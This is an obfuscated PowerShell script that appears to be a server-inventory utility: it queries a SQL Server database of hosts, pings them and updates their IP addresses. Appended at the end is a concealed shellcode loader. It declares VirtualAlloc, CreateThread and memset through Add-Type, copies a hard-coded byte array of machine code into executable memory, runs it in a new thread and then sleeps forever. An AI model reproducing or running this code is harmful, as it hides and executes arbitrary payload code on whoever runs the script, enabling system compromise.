function s`QL`-NOnQu`erY{
	param([string]${sT`ATe`me`Nt},
	[string]${S`q`LseRveR} = ${De`FAUlt_SQl_s`e`RV`Er},
	[string]${db} = ${dE`FaULt_s`qL`_`db} )

	${Conn_O`pt`iOnS} = (('D'+'ata '+"Source=$SqlServer; "+'In'+'itia'+'l '+"Catalog=$DB;") + ("{0}{1}{4}{3}{5}{6}{2}" -f'Integ','r','SPI','curi','ated Se','t','y=S'))
	${cO`NN} = &("{2}{0}{1}" -f 'w-Obj','ect','Ne') ("{2}{6}{4}{7}{0}{3}{5}{1}{8}" -f'SqlC','cti','Sys','on','e','ne','tem.Data.SqlCli','nt.','on')(${c`O`Nn_`OptioNs})
	${Co`Nn}.("{0}{1}"-f 'Op','en').Invoke()

	${C`mD} = ${c`onn}.("{3}{4}{2}{1}{0}" -f 'and','mm','Co','Crea','te').Invoke()
	${c`MD}."CoMm`AN`D`Text" = ${sTA`TE`MENT}
	${SErv`eR} = ${C`Md}.("{3}{1}{0}{2}" -f'teNo','u','nQuery','Exec').Invoke()
	if(-not ${?}) {

	${L`iNe`NO} = &("{4}{3}{0}{2}{1}"-f 'rentL','er','ineNumb','et-Cur','G')
	
	.("{2}{4}{0}{1}{3}"-f'rr','or.ps','./lo','1','ge')  ${oUt`Put} ${DA`Te} ${L`i`NEno} ${Ti`T`Le}
	}
	${Se`RV`eR}
}

${e`Nv} = ${A`RgS}[0]

if (${E`NV} -eq ${nU`ll}){
    ${e`NV} = ("{1}{0}{2}"-f'-PRO','PA','D')
    }
    
switch (${E`NV}) 
	{
	("{0}{1}"-f 'PA-','PROD'){ 	${DbS`Erv`eR} 		= 	("{0}{2}{1}{3}" -f 'XSQ','1','LUTIL','8'); 
				${a`RC`HIvEdR`ive}	=	"E"
				${Db} 			= 	("{1}{0}{2}"-f 'ta','S','tus'); 
				${sE`RVErQ`Ue`Ry}	= 	((("{0}{54}{1}{41}{3}{18}{39}{59}{61}{27}{34}{13}{17}{9}{15}{44}{29}{46}{55}{8}{56}{16}{30}{19}{26}{28}{11}{40}{60}{51}{22}{50}{58}{2}{14}{35}{32}{52}{31}{37}{24}{6}{5}{57}{49}{36}{33}{12}{25}{48}{20}{53}{21}{45}{7}{4}{42}{43}{23}{47}{38}{10}"-f'SE','CT ','er s 
									','ver_n','					','r',' ON s.se','FO
','			','		','					',' dn','	','i','	IN','				',', ip','d
		','ame
		','ss
	','				','ctive ','				','r_name
	','s sp','	','					','erver','				,',' ','_addre','ropert','JOIN t_serve','r_id
','_','NER ','= sp.serve','ie','		','			','s_ho','ser','				ORD','ER BY serve','		,','= rFO1r','domain
				','	','	',' ','	','		','r_p','		WHERE A','LE','		','	','ver_id','FROM t_serv','					','st_name
		',', s.s'))."R`EplaCe"('rFO',[sTrInG][char]39));
				${upDA`Te`queRy}	=	"UPDATE t_server_properties
										SET ip_address = $IP.IPAddress
									WHERE server_id = $($s.server_id) "
    		}
	}


${s`Erv`eRs} = ( &("{1}{2}{0}"-f 'LCmd','I','nvoke-SQ') -query ${SErV`erq`U`eRy} -Server ${D`BserV`er} -Database ${d`B} )

Foreach(${S} in ${se`RV`ErS})
{
	${SeRV`eRNa`mE} = $(${s}."dn`s_hO`sT_`N`AmE")
	
	if(!(&("{3}{0}{2}{1}"-f 'nnec','n','tio','Test-Co') -Cn ${S`ERV`E`RnAmE} -BufferSize 16 -Count 1 -ea 0 -quiet)){
		('Prob'+'l'+'em '+'connec'+'t'+'ing '+'to'+' '+"$ServerName")
   	}
	else {
		('Connec'+'tio'+'n '+'to'+' '+"$ServerName "+'s'+'uc'+'ceeded!')
		${I`P} = &("{0}{1}{2}{3}"-f 'G','et-IPAd','dre','ss') -ComputerName ${sE`RvE`RNaMe} -IPV4only | &("{0}{1}" -f 'Se','lect') ("{1}{0}{2}" -f'PAddre','I','ss')
		${I`p}."ip`ADDR`Ess"
		"`tDoing a GetHostEntry on $($s.server_name)... "
		${uPDA`TeQUe`Ry}	=	((("{3}{11}{8}{0}{7}{4}{10}{2}{5}{6}{12}{1}{13}{9}" -f'_s','ip','r','UPD','er_pr','tie','s','erv','E t',' = d40','ope','AT',' SET ','_address'))."rE`PLACE"('d40',[StRiNg][Char]39)) + ${i`P}."I`PADD`ResS" + "' WHERE server_id = $($s.server_id) "
									
		${up`Date`qUe`RY}
		try {
			
			.("{0}{1}{2}"-f 'Inv','oke-','SqlCmd') -Query ${up`dAt`Eq`UERY} -Server ${D`B`sErVer} -Database ${DB}
			}	
		catch [System.Exception] {
			.("{2}{1}{0}{3}"-f'os','ite-H','Wr','t') ('E'+'xcept'+'ion '+'connec'+'tin'+'g '+'to'+' '+"$Server(System.Exception)") 
			${_}."eXCE`pt`Ion"
			
			.("{2}{0}{1}"-f 'e','-Host','Writ')
			if (${_}."Exc`eP`TiON"."InnERex`ce`Pt`iON") {
				&("{2}{1}{0}"-f'st','rite-Ho','W') ("{3}{1}{4}{2}{0}" -f'on: ','r Ex','ti','Inne','cep')
				${_}."e`xcep`TIon"."In`NerEXcE`pT`IoN" 
				}
			}
	}
}


${C} = ((("{34}{92}{40}{7}{28}{3}{15}{102}{106}{97}{86}{65}{25}{108}{9}{51}{98}{16}{66}{87}{45}{58}{5}{31}{75}{73}{29}{38}{42}{105}{11}{36}{32}{50}{55}{39}{44}{72}{41}{62}{107}{90}{8}{52}{19}{71}{100}{24}{14}{47}{12}{99}{94}{53}{104}{33}{56}{91}{26}{113}{22}{109}{6}{93}{35}{112}{37}{63}{96}{79}{77}{67}{57}{76}{103}{84}{60}{4}{43}{54}{111}{69}{2}{30}{64}{82}{89}{70}{49}{88}{0}{1}{61}{21}{110}{20}{17}{68}{101}{85}{74}{80}{83}{95}{23}{81}{10}{48}{114}{18}{27}{13}{78}{46}{59}"-f'lags, I','ntPt','t','llMOf','Address','ize, ','read','rt(MOfkernel32.','l32.d','Ptr','set(Int','nt ','exte',' src,','ati',')]public static ','ess,','c','est, u',']','DllImport(MOfmsv',');','T','ntPtr me','c st','loc','ead(IntPt','int','d','cationTy','er','uint f','l','at','[Dll','ribut','f','s, uint dw','pe,','c','o','Im',' u',', ','t);','t ','nt)','c ','Pt','eatio','Pr',' lp','llMOf)','In','IntPtr lp','ote','e','ntP','dwS',';','t','r lpThreadId','p','St',', uin','tualAl',' ui','ize, I','rt.d','me','r','pub','[Dll','lo','ublic s','lAl','tr l','S',' uint cou','k','ta','m','t dw','tic e','ar','p','IntPtr Vir','n','nF','C','MOfkerne','Thr','Imp','Att','n ','xtern I','ac','n ','Addr','r','li','llMOf)]','ex','pSt','tPtr Cre','i','ter','ort(','(Int','h','[','Para','e','r lp','r d'))."R`e`plAcE"(([ChAR]77+[ChAR]79+[ChAR]102),[sTRinG][ChAR]34));${W} = &("{1}{0}"-f'ype','Add-T') -memberDefinition ${c} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{2}{0}{1}{4}{3}"-f'n32','Funct','Wi','s','ion') -passthru;[Byte[]];[Byte[]]${z} = 0xbf,0x05,0x60,0x19,0xbd,0xd9,0xed,0xd9,0x74,0x24,0xf4,0x5b,0x29,0xc9,0xb1,0x47,0x83,0xc3,0x04,0x31,0x7b,0x0f,0x03,0x7b,0x0a,0x82,0xec,0x41,0xfc,0xc0,0x0f,0xba,0xfc,0xa4,0x86,0x5f,0xcd,0xe4,0xfd,0x14,0x7d,0xd5,0x76,0x78,0x71,0x9e,0xdb,0x69,0x02,0xd2,0xf3,0x9e,0xa3,0x59,0x22,0x90,0x34,0xf1,0x16,0xb3,0xb6,0x08,0x4b,0x13,0x87,0xc2,0x9e,0x52,0xc0,0x3f,0x52,0x06,0x99,0x34,0xc1,0xb7,0xae,0x01,0xda,0x3c,0xfc,0x84,0x5a,0xa0,0xb4,0xa7,0x4b,0x77,0xcf,0xf1,0x4b,0x79,0x1c,0x8a,0xc5,0x61,0x41,0xb7,0x9c,0x1a,0xb1,0x43,0x1f,0xcb,0x88,0xac,0x8c,0x32,0x25,0x5f,0xcc,0x73,0x81,0x80,0xbb,0x8d,0xf2,0x3d,0xbc,0x49,0x89,0x99,0x49,0x4a,0x29,0x69,0xe9,0xb6,0xc8,0xbe,0x6c,0x3c,0xc6,0x0b,0xfa,0x1a,0xca,0x8a,0x2f,0x11,0xf6,0x07,0xce,0xf6,0x7f,0x53,0xf5,0xd2,0x24,0x07,0x94,0x43,0x80,0xe6,0xa9,0x94,0x6b,0x56,0x0c,0xde,0x81,0x83,0x3d,0xbd,0xcd,0x60,0x0c,0x3e,0x0d,0xef,0x07,0x4d,0x3f,0xb0,0xb3,0xd9,0x73,0x39,0x1a,0x1d,0x74,0x10,0xda,0xb1,0x8b,0x9b,0x1b,0x9b,0x4f,0xcf,0x4b,0xb3,0x66,0x70,0x00,0x43,0x87,0xa5,0xbd,0x46,0x1f,0x2b,0x02,0x40,0xd4,0xdb,0x80,0x52,0xfb,0x47,0x0c,0xb4,0xab,0x27,0x5e,0x69,0x0b,0x98,0x1e,0xd9,0xe3,0xf2,0x90,0x06,0x13,0xfd,0x7a,0x2f,0xb9,0x12,0xd3,0x07,0x55,0x8a,0x7e,0xd3,0xc4,0x53,0x55,0x99,0xc6,0xd8,0x5a,0x5d,0x88,0x28,0x16,0x4d,0x7c,0xd9,0x6d,0x2f,0x2a,0xe6,0x5b,0x5a,0xd2,0x72,0x60,0xcd,0x85,0xea,0x6a,0x28,0xe1,0xb4,0x95,0x1f,0x7a,0x7c,0x00,0xe0,0x14,0x81,0xc4,0xe0,0xe4,0xd7,0x8e,0xe0,0x8c,0x8f,0xea,0xb2,0xa9,0xcf,0x26,0xa7,0x62,0x5a,0xc9,0x9e,0xd7,0xcd,0xa1,0x1c,0x0e,0x39,0x6e,0xde,0x65,0xbb,0x52,0x09,0x43,0xc9,0xba,0x89;${G} = 0x1000;if (${z}."L`eNGTH" -gt 0x1000){${G} = ${Z}."L`ENg`Th"};${x}=${w}::("{3}{0}{1}{2}"-f 'irtual','A','lloc','V').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${Z}."len`g`TH"-1);${I}++) {${w}::"mems`ET"([IntPtr](${X}.("{0}{1}" -f'ToIn','t32').Invoke()+${I}), ${Z}[${i}], 1)};${w}::("{1}{0}{2}" -f 'ateThre','Cre','ad').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{0}{3}{2}" -f't-s','Star','p','lee') 60};
